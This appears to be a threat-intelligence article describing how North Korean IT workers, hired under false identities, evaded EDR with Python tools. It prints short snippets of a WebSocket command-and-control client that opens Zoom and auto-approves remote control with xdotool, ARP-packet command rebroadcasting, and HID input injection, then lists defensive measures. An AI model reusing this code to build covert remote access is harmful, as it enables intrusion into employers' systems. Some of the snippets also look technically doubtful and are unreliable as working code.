In mid-2024, investigators uncovered a sophisticated operation where North Korean IT workers, using false identities to get hired by Western companies, stealthily bypassed robust Endpoint Detection and Response (EDR) systems by exploiting standard remote work tools and overlooked network behaviors.
Instead of using traditional malware, these adversaries wove a covert command-and-control (C2) framework directly into common collaboration software and protocols demonstrating that in the era of SaaS and distributed workforces, attackers no longer need to “break in” when they can simply be “let in.”
Technical Analysis
The operation began when a company laptop issued to a fraudulent remote employee was seized and analyzed. Forensic specialists uncovered a multi-component Python toolset embedded in the user’s development environment; these scripts took advantage of the very software and protocols trusted by EDR solutions.
Key Mechanisms Used:
Abusing ARP Traffic for Stealthy Signal Propagation:
The attacker deployed lightweight scripts using Scapy, a powerful Python networking library, to send and listen for specially crafted ARP packets.
This allowed the attacker to trigger workflows and rebroadcast commands across devices in the same local network—undetectable by most EDRs, which typically do not flag ARP-layer traffic.
Example: ARP Command Rebroadcast (Python)
pythonfrom scapy.all import sendp, Ether, ARP
def rebroadcast_command(command):
packet = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, hwsrc=command, psrc="0.0.0.0")
sendp(packet, iface="eth0")
WebSocket-Based Command and Control:
Unlike noisy traditional HTTP polling, persistent WebSocket connections enabled covert bidirectional communication between the compromised endpoint and the remote attacker’s C2 server.
Commands such as launching Zoom or granting remote control access were delivered in real time, leaving minimal artifacts for network forensics.
WebSocket Client Command Interface
pythonimport websocket
import json
import subprocess
def on_message(ws, message):
data = json.loads(message)
if data.get("command") == "open_zoom":
subprocess.run(["xdg-open", "zoommtg://zoom.us/start"])
elif data.get("command") == "approve_remote":
subprocess.run(["xdotool", "key", "Return"])
ws = websocket.WebSocketApp("ws://[REDACTED]", on_message=on_message)
ws.run_forever()
Zoom Automation for Remote Access:
Rather than exploiting Zoom vulnerabilities, the attacker automated the native remote-control features of Zoom through simulated input—bypassing traditional red flags by never attempting to subvert application logic.
Scripts would launch Zoom, initiate or join remote sessions, and automatically approve control prompts, allowing the attacker full desktop access in a way that appears entirely legitimate to EDR
Zoom Remote Approval Automation
pythonsubprocess.run(["xdg-open", "zoommtg://zoom.us/start"], check=True)
subprocess.run(["xdotool", "key", "Return"], check=True)
Input Simulation Agents:
Low-level device emulation, such as writing directly to /dev/hidg0, enabled the simulation of keyboard and mouse activity. This made attacker actions indistinguishable from normal user input in most logs and behavioral heuristics.
HID Injection Example
pythonimport base64
def replay_input(encoded_event):
decoded = base64.b64decode(encoded_event)
with open("/dev/hidg0", "wb") as f:
f.write(decoded)
Operational Flow: Living in Legitimate Workflows
The attack chain commenced with user presence beaconing, signaling to the C2 server only when the legitimate user was active—reducing the risk of detection.
Commands were then dispatched over WebSocket, rebroadcasted locally using ARP packets, and executed via input simulation agents.
Critically, even though the attacker gained persistent remote access, all activity transpired within the bounds of sanctioned software and routine workflows, leaving few traces outside normal baselines.
Despite the sophistication, the approach did not bypass user-facing security prompts in Zoom or suppress participant lists; rather, it relied on scripting and careful configuration to minimize visible disruptions.
Implications and Defense
This campaign underscores the limitations of signature-based and conventional behavior-based security tools in modern, trust-oriented environments. Organizations are urged to:
- Deploy network monitoring tailored for ARP and other protocol anomalies (tools like Zeek or NetFlow).
- Closely manage and audit WebSocket connections and developer tool usage.
- Segment networks and restrict lateral peer-to-peer traffic.
- Extend endpoint logging and detection to capture synthetic HID events and application automation efforts.
The most unsettling lesson is not just the technical evasion but the adversary’s ability to operate within the perimeter by blending into legitimate processes.
As IT outsourcing and remote collaboration escalate, organizations must adapt to a new threat model where trust is a primary attack surface, and visibility must extend beyond malware to the very tools and protocols that make remote work possible.
